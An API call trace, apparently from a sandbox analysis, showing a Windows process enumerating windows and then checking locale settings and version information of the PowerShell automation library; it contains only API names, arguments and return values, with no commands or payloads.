	[0586.269] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1298
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x120c
	[0586.269] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x122c
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x11c4
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x11b0
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1188
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1148
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1160
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x10fc
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe34
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xea4
	[0586.270] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x514
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe48
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xbc8
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xdf8
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x318
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xcac
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x8bc
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xf9c
	[0586.271] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xf48
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe40
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xecc
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xeb8
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe80
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe98
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe60
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xee4
	[0586.272] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xf00
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xdf0
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xe1c
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xdd0
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xd94
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xd74
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xd00
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xcd8
	[0586.273] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc84
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xca4
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc64
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xc24
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xb84
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xbac
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x384
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xab8
	[0586.274] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x33c
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa44
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa64
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x8a8
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xaf0
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x88c
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xb04
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x910
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x230
	[0586.275] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xac0
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xab4
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xaac
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x3d0
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x978
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa7c
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x59c
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa88
	[0586.276] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa6c
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa68
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x9f8
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xa04
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x924
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x8dc
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x7dc
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x768
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x764
	[0586.277] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x820
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x810
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x794
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x83c
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x7ac
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xb44
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xb5c
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x838
	[0586.278] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.279] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x818
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x5b8
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x494
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1ec
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x440
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x7e8
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x730
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x2c8
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x31c
	[0586.280] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x330
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x128
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x5c8
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x6f8
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x358
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x73c
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0xb0
	[0586.281] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x250
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x240
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x790
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x61c
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x540
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x538
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x568
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x538
	[0586.282] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x568
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x538
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x540
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x540
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x57c
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x460
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x554
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.283] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x528
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x79c
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4e0
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.284] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x460
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x460
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x44c
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x778
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x460
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x558
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x4d0
	[0586.285] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1bb4
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x10bc
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b50
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x14b4
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x149c
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x14a8
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1490
	[0586.286] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x14a4
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x148c
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1458
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b4c
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1b3c
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x19bc
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x199c
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1998
	[0586.287] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1994
	[0586.288] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1990
	[0586.288] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1984
	[0586.288] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x197c
	[0586.288] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1978
	[0586.288] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x14dcc0 | out: lpdwProcessId=0x14dcc0) returned 0x1824
	[0586.292] WerSetFlags () returned 0x0
	[0587.863] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0587.864] CoTaskMemFree (pv=0x0) 
	[0587.865] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14e028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14e020 | out: pulNumLanguages=0x14e028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14e020) returned 1
	[0587.865] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14e028, pwszLanguagesBuffer=0x2c62b00, pcchLanguagesBuffer=0x14e020 | out: pulNumLanguages=0x14e028, pwszLanguagesBuffer=0x2c62b00, pcchLanguagesBuffer=0x14e020) returned 1
	[0587.870] CoTaskMemAlloc (cb=0x24) returned 0x2ea570
	[0587.870] GetUserDefaultLocaleName (in: lpLocaleName=0x2ea570, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0587.871] CoTaskMemFree (pv=0x2ea570) 
	[0587.895] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0587.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.895] CoTaskMemFree (pv=0x27a530) 
	[0587.897] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0587.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.897] CoTaskMemFree (pv=0x27a530) 
	[0587.900] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0587.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.900] CoTaskMemFree (pv=0x27a530) 
	[0589.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.865] SetErrorMode (uMode=0x1) returned 0x1
	[0589.865] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14dca0 | out: lpFileInformation=0x14dca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0589.865] SetErrorMode (uMode=0x1) returned 0x1
	[0589.865] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14df10 | out: lpdwHandle=0x14df10) returned 0x94c
	[0589.866] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c66390 | out: lpData=0x2c66390) returned 1
	[0589.867] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14de88, puLen=0x14de80 | out: lplpBuffer=0x14de88*=0x2c6642c, puLen=0x14de80) returned 1
	[0589.867] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c66508, puLen=0x14ddf0) returned 1
	[0589.867] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0589.867] CoTaskMemAlloc (cb=0x2e) returned 0x2ef990
	[0589.867] lstrcpyW (in: lpString1=0x2ef990, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0589.867] CoTaskMemFree (pv=0x2ef990) 
	[0589.867] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c6655c, puLen=0x14ddf0) returned 1
	[0589.868] lstrlenW (lpString="System.Management.Automation") returned 28
	[0589.868] CoTaskMemAlloc (cb=0x3c) returned 0x2ee190
	[0589.868] lstrcpyW (in: lpString1=0x2ee190, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0589.868] CoTaskMemFree (pv=0x2ee190) 
